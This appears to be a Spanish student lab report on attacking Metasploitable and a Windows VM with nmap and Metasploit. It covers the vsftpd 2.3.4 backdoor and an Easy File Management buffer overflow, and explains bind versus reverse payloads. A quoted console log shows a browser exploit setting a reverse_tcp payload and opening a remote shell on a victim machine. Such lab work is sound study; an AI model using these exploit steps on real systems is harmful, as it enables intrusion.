Anda di halaman 1dari 10

1.

Para realizar el fingerprint en la maquina metasploitable se realiza un scaneo de equipos y


puertos en el segmento de red para detectar la maquina metasploitable con la herramienta
nmap y la opción -sV para identificar los puertos y versiones de servicios corriendo en la
maquina a atacar. Ver imagen 1 y 2. En el cual se evidencia que se identifica la maquina
anfitrión (ip: 192.168.191.1) de nuestras máquinas virtuales Kali y metasploitable y la
maquina metasploitable con dirección ip:192.168.191.136

Imagen Nro. 1

Imagen Nro 2

En la imagen Nro 2 identificamos en la maquina con ip 192.168.191.136 (Metasploitable)


está en operación lo siguientes puertos y servicios con las versiones:
Puerto Estado Servicio Version
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGR OUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGR OUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

2. Para realizar el payload sobre la maquina metasploitable a través del puerto 21 usamos la
herramienta metasploit.

Ingresamos a la consola de metasploit por medio del menú desplegable de Kali –


Aplicaciones – opción 08- Herramientas de explotación e ingresamos a metasploit (Ver
imagen 3 y 4).

Imagen Nro 3
Imagen Nro 4

Una vez en la consola usaremos el comando search para identificar si la versión de vsftpd
2.3.4 tiene un exploit en la base de datos de metasploit (Ver Imagen Nro 5)

Imagen Nro 5

Con el exploit “ exploit/unix/ftp/vsftpd_234_backdoor” identificado realizaremos el ataque usando


el comando use. Ver imangen Nro 6.
Imagen Nro 6

Con el comando show options se identifica las opciones que debemos ingresar para
ejecutar el exploit. (Ver imagen Nro 7)

Imagen Nro 7

Ingresamos las opciones requeridas RHOST (dirección ip maquina objetivo) y RPORT


(Puerto 21) con el comando SET y ejecutamos el exploit con el comando exploit. (Ver
imagen Nro 8)
Imagen Nro 8

Comprobamos con el comando ifconfig que estamos en control de la maquina objetivo


metasploitable con dirección ip 192.168.191.136. (Ver imagen Nro 9)

Imagen Nro 9

3. Explicar la diferencia entre un payload de tipo bind y reverse.

Payload de tipo bind: Se realiza cuando identificamos un puerto abierto y este puede ser
vulnerable a conexiones externas. Cuando lo atacamos nos conectamos originando la sesión
desde el atacante. Ejemplo el usuado para realizar la explotación de la maquina
metasploitable por el puerto 21. (Ver imagen Nro 9)

Payload de tipo Reverse o Connect Back: Este tipo de ataque se origina en la víctima. La
conexión se realiza desde la maquina objetivo al atacante. Se logra realizando que los
procesos o la victima ejecuten un playload reverse sin conocerlo como ejemplo tenemos:
El siguiente texto muestra cómo se configura el exploit que explota la vulnerabilidad de
cursos animado en Windows. El exploit no es lanzado hasta que la víctima accede a nuestro
sitio web malicioso. (Ver https://securityhacklabs.net/articulo/metasploit-tipos-de-
exploits)

msf > use exploit/windows/browser/ani_loadimage_chunksize

msf exploit(ani_loadimage_chunksize) > set URIPATH /

URIPATH => /

msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5

LHOST => 192.168.1.5

msf exploit(ani_loadimage_chunksize) > set LPORT 4444

LPORT => 4444

msf exploit(ani_loadimage_chunksize) > exploit

[*] Exploit running as background job.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.5:8080/

[*] Server started.

msf exploit(ani_loadimage_chunksize) >

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending HTML page to 192.168.1.100:1077...

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to
192.168.1.100:1077...

[*] Sending stage (240 bytes)

[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2


[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

4. Instalar en Windows la aplicación Easy File Management Web Server 5.3


(https://www.exploit-db.com/apps/a46371c665d7c85689b47534904bc3f1-efmsetup.exe)
y detallar el proceso de explotación con Metasploit.

Como usamos las maquinas de la sala de seguridad informática, la maquina de Windows


configurada (ip:192.168.189.137) para la actividad de vulnerabilidades tiene la aplicación
Easy File Management Web Server 5.3.

Para realizar la explotación con metasploit de la maquina Windows ejecutamos desde


consola de metasploit (el ingreso a la consola de metasploit se describe en las imágenes nro
3 y 4) en la maquina Kali el comando search y buscamos si la aplicación Easy File
Management Web Server 5.3 tiene vulnerabilidades. (Ver imagin Nro 10) y se identifica que
tiene gran cantidad de exploit. De la lista desplegada escogemos el exploit
“exploit/windows/http/efs_fmws_userid_bof” que explota una vulnerabilidad de buffer
overflow.

Imagen Nro 10
Imagen Nro 11

Con el comando show options se identifica las opciones que debemos ingresar para
ejecutar el exploit. (Ver imagen Nro 12)

Imagen Nro 12
Ingresamos las opciones LHOST (host local) y RHOST (host remoto) requeridas con el
comando set (Ver imagen Nro 13 y 14) y ejecutamos el comando exploit.

Imagen Nro 13

Imagen Nro 14

Comprobamos que estemos en la maquina atacada con el comando ifconfig nos visualiza
la ip de la máquina de Windows ip:192.168.189.137 (ver Imagen Nro 16 )
Imagen Nro 15

Imagen Nro 16

Anda mungkin juga menyukai